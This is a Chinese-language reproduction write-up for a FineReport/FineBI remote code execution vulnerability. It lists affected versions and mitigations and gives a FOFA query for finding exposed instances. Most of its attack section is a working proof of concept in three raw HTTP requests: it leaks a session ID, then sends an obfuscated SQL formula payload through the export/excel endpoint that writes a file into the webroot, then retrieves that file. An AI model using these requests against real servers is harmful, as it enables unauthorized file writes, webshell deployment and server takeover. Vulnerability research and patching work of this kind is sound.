FineReport 帆软报表前台远程代码执行漏洞复现

漏洞简介

漏洞描述

帆软报表是一款专业的企业级报表工具,专注于数据可视化与分析。它支持多数据源连接,能快速制作各类复杂报表和动态仪表板。通过拖拽式操作和灵活定制,帮助企业实现高效的数据决策与业务洞察。

2025年12月,长亭安全应急响应中心监测到帆软报表和数据决策系统存在远程代码执行漏洞。经分析,攻击者可利用export/excel接口构造SQL注入语句写入Webshell,进而获取服务器权限。由于该漏洞可组合SessionID泄露漏洞实现前台无条件利用,导致利用难度较低,建议受影响的用户尽快修复。

综合处置优先级:高

基本信息

微步编号

XVE-2025-46624

漏洞类型

远程代码执行

利用条件评估

利用漏洞的网络条件

远程

是否需要绕过安全机制

不需要

对被攻击系统的要求

利用漏洞的权限要求

是否需要受害者配合

利用情报

POC是否公开

已知利用行为

漏洞影响范围

产品名称

帆软软件有限公司 | FineReport报表软件 帆软软件有限公司 | FineBi商业智能软件 帆软软件有限公司 | FineDataLink

受影响版本

FineReport: version < 11.5.4.1 FineBi: version < 7.0.5, version < 6.1.8 FineDataLink: version < 5.0.4.3, version < 4.2.11.3

有无修复补丁

⚫ FineReport 11.5.4 及以下版本(2025.09.29 及之前)

⚫ FineBI 7.0.4 及以下版本(2025.09.12 及之前)

⚫ FineBI 6.1.7.3 及以下版本(2025.09.29 及之前)

⚫ FineBI 6.0.23.2 及以下版本(2025.09.26 及之前)

⚫ FineDataLink 5.0.4.2 及以下版本(2025.10.16 及之前)

⚫ FineDataLink 4.2.11.2 及以下版本(2025.10.16 及之前)

临时缓解措施:

  • 非运维平台部署的项目:请前往单机工程节点/每个集群工程节点,进入工程/webroot/WEB-INF/lib目录,删除sqlite相关驱动,并重启工程生效

  • 运维平台部署的项目,或无法删除驱动重启的项目:请管理员登录帆软应用,点击「管理系统>数据连接>数据连接管理」,删除自行创建的sqlite类型的数据连接,删除产品内置的sqlite类型数据连接:FRDemo、BI Demo,无需重启工程即可生效

  • 使用防护类设备进行防护,拦截请求中出现的恶意SQL语句(完整漏洞利用路径与利用特征可通过微步漏洞情报查询)

修复方案

官方修复方案:

FOFA语句:

body="/webroot/decision/" || (body="FineReport" && body="content="FineReport--Web Reporting Tool"") || title="FineReport" || title="FineReport报表" || title="FineBI"

安装环境

安装包:https://pan.baidu.com/s/1hGxPKnmaScPf8ypjVDwhwQ?pwd=qt2r

不清楚是不是版本问题,网上给出的利用方法和我本地复现不一样

参考:https://cn-sec.com/archives/4839141.html

漏洞复现

漏洞POC

1、获取id

GET /webroot/ReportServer HTTP/1.1
​
Host: XXXX
​
Cache-Control: max-age=0
​
Accept-Language: zh-CN,zh;q=0.9
​
Upgrade-Insecure-Requests: 1
​
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
​
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
​
Accept-Encoding: gzip, deflate, br
​
viewlets: [{'reportlet':'/'}]
​
op: getSessionID
image-20260218163247118

2、用获取的id构造数据包

GET /webroot/decision/nx/report/v9/largedataset/export/excel?functionParams=%7B%7D&__parameters__=%7B%7D HTTP/1.1
​
Host: XXXX
​
Cache-Control: max-age=0
​
Accept-Language: zh-CN,zh;q=0.9
​
Upgrade-Insecure-Requests: 1
​
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
​
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
​
Accept-Encoding: gzip, deflate, br
​
sessionID: cd1c0673-ad9f-4261-870c-90736bfe1de4
​
params: %3Cpd%3E%0A+%3CLargeDatasetExcelExportJS+dsName%3D%221%22%3E%0A%3CParameters%3E%3CParameter%3E%0A%3CAttributes+name%3D%22c%22%2F%3E%3CO+t%3D%22Formula%22%3E%3CAttributes%3E%3C%21%5BCDATA%5Bsql%28%27FRDemo%27%2CCONCATENATE%28%22pr%22%2C%22agm%22%2C%22a+wr%22%2C%22i%22%2C%22t%22%2C%22a%22%2C%22ble%22%2C%22_sch%22%2C%22e%22%2C%22ma%3Do%22%2C%22n%22%29%2C1%29-sql%28%27FRDemo%27%2CCONCATENATE%28%22dele%22%2C%22t%22%2C%22e+f%22%2C%22r%22%2C%22o%22%2C%22m+sq%22%2C%22li%22%2C%22t%22%2C%22e_sc%22%2C%22he%22%2C%22ma+w%22%2C%22here%22%2C%22+na%22%2C%22m%22%2C%22e%21%22%2C%22%3D%22%2C%22%27s%22%2C%22ql%22%2C%22ite%22%2C%22_s%22%2C%22ta%22%2C%22t%22%2C%221%27%22%29%2C1%29-sql%28%27FRDemo%27%2CCONCATENATE%28%22an%22%2C%22aly%22%2C%22ze%22%29%2C1%29-sql%28%27FRDemo%27%2CCONCATENATE%28%22re%22%2C%22p%22%2C%22lac%22%2C%22e+i%22%2C%22nto%22%2C%22+s%22%2C%22ql%22%2C%22ite_%22%2C%22st%22%2C%22at%22%2C%221+va%22%2C%22lu%22%2C%22es%28%27%22%2C%22%27%2C%27123%22%2C%22%27%22%2C%22%29%22%29%2C1%29-sql%28%27FRDemo%27%2CCONCATENATE%28%22V%22%2C%22A%22%2C%22C%22%2C%22U%22%2C%22U%22%2C%22M%22%2C%22+i%22%2C%22nt%22%2C%22o%28%27%22%2CENV_HOME%2C%22%2F%22%2C%22.%22%2C%22.%22%2C%22%2F%22%2C%22.%22%2C%22%2F%22%2C%22123%22%2C%22.%22%2C%22t%22%2C%22x%22%2C%22t%22%2C%22%27%29%22%29%2C1%29%5D%5D%3E%3C%2FAttributes%3E%3C%2FO%3E%3C%2FParameter%3E%3C%2FParameters%3E%3C%2FLargeDatasetExcelExportJS%3E%3C%2Fpd%3E
image-20260218171307681

3、访问生成的文件

GET /webroot/123.txt HTTP/1.1
​
Host: XXXX
​
Cache-Control: max-age=0
​
Accept-Language: zh-CN,zh;q=0.9
​
Upgrade-Insecure-Requests: 1
​
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
​
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
​
Accept-Encoding: gzip, deflate, br

声明

仅用来描述和检测可能存在的安全问题。由于传播、利用此安全公告所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。